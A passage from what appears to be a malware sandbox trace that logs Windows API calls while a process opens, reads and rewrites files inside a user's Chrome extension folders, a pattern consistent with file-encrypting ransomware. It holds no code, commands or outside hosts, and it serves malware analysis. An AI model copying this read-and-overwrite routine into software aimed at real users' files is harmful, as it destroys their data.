hTemplateFile=0x0) returned 0x20c [0168.676] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.676] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x44b [0168.676] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0168.676] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.676] ReleaseMutex (hMutex=0x168) returned 1 [0168.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.676] ReadFile (in: hFile=0x20c, lpBuffer=0x269c668, nNumberOfBytesToRead=0x44b, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2d5f2bc*=0x44b, lpOverlapped=0x0) returned 1 [0170.062] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0170.062] WriteFile (in: hFile=0x20c, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9d3, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x9d3, lpOverlapped=0x0) returned 1 [0170.062] CloseHandle (hObject=0x20c) returned 1 [0170.063] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0170.064] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.064] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x310 [0170.064] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.064] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.064] ReleaseMutex (hMutex=0x168) returned 1 [0170.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="manifest.json", lpUsedDefaultChar=0x0) returned 13 [0170.064] ReadFile (in: hFile=0x20c, lpBuffer=0x2893a98, nNumberOfBytesToRead=0x310, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2893a98*, lpNumberOfBytesRead=0x2d5f2bc*=0x310, lpOverlapped=0x0) returned 1 [0170.066] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0170.066] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x898, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2d5f2d0*=0x898, lpOverlapped=0x0) returned 1 [0170.067] CloseHandle (hObject=0x20c) returned 1 [0170.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0170.068] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.068] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd7 [0170.068] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.069] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.069] ReleaseMutex (hMutex=0x168) returned 1 [0170.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0170.069] ReadFile (in: hFile=0x20c, lpBuffer=0x26c49b8, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c49b8*, lpNumberOfBytesRead=0x2d5f2bc*=0xd7, lpOverlapped=0x0) returned 1 [0170.070] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0170.071] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x65f, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x65f, lpOverlapped=0x0) returned 1 [0170.071] CloseHandle (hObject=0x20c) returned 1 [0170.071] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0170.073] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.073] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xf2 [0170.073] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.074] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.074] ReleaseMutex (hMutex=0x168) returned 1 [0170.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0170.074] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xf2, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2d5f2bc*=0xf2, lpOverlapped=0x0) returned 1 [0170.075] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0170.075] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x67a, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2d5f2d0*=0x67a, lpOverlapped=0x0) returned 1 [0170.076] CloseHandle (hObject=0x20c) returned 1 [0170.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0170.077] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.077] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x108 [0170.077] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.077] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.077] ReleaseMutex (hMutex=0x168) returned 1 [0170.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0170.078] ReadFile (in: hFile=0x20c, lpBuffer=0x1ef1a78, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1a78*, lpNumberOfBytesRead=0x2d5f2bc*=0x108, lpOverlapped=0x0) returned 1 [0170.079] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0170.079] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2d5f2d0*=0x690, lpOverlapped=0x0) returned 1 [0170.079] CloseHandle (hObject=0x20c) returned 1 [0170.080] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0170.080] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.081] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x127 [0170.081] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.081] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.081] ReleaseMutex (hMutex=0x168) returned 1 [0170.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0170.081] ReadFile (in: hFile=0x20c, lpBuffer=0x1f199a8, nNumberOfBytesToRead=0x127, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f199a8*, lpNumberOfBytesRead=0x2d5f2bc*=0x127, lpOverlapped=0x0) returned 1 [0170.082] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0170.082] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x6af, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6af, lpOverlapped=0x0) returned 1 [0170.083] CloseHandle (hObject=0x20c) returned 1 [0170.083] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0170.084] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.084] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x8c0bf [0170.084] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.084] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.084] ReleaseMutex (hMutex=0x168) returned 1 [0170.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="angular.js", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0170.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="angular.js", cchWideChar=10, lpMultiByteStr=0x1f732cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="angular.js", lpUsedDefaultChar=0x0) returned 10 [0170.085] ReadFile (in: hFile=0x20c, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0170.088] ReadFile (in: hFile=0x20c, lpBuffer=0x2840938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0170.089] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x8b0bf [0170.089] ReadFile (in: hFile=0x20c, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0170.091] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x8b0bf [0170.092] WriteFile (in: hFile=0x20c, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0170.092] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0170.092] WriteFile (in: hFile=0x20c, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0170.092] WriteFile (in: hFile=0x20c, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0170.093] CloseHandle (hObject=0x20c) returned 1 [0170.093] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0170.094] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.094] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xf2 [0170.094] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.094] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.094] ReleaseMutex (hMutex=0x168) returned 1 [0170.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_app_redirect.js", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0170.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_app_redirect.js", cchWideChar=20, lpMultiByteStr=0x1f88bcc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cast_app_redirect.js", lpUsedDefaultChar=0x0) returned 20 [0170.095] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xf2, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2d5f2bc*=0xf2, lpOverlapped=0x0) returned 1 [0170.096] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0170.096] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x67a, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2d5f2d0*=0x67a, lpOverlapped=0x0) returned 1 [0170.096] CloseHandle (hObject=0x20c) returned 1 [0170.097] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0170.098] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.098] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xc878 [0170.098] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0170.098] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.098] ReleaseMutex (hMutex=0x168) returned 1 [0170.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="common.js", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0170.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="common.js", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="common.js", lpUsedDefaultChar=0x0) returned 9 [0170.098] ReadFile (in: hFile=0x20c, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0171.059] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xb878 [0171.059] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.060] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xb878 [0171.060] WriteFile (in: hFile=0x20c, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0171.060] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0171.060] WriteFile (in: hFile=0x20c, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0171.061] CloseHandle (hObject=0x20c) returned 1 [0171.061] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0171.062] SetFilePointer (in: 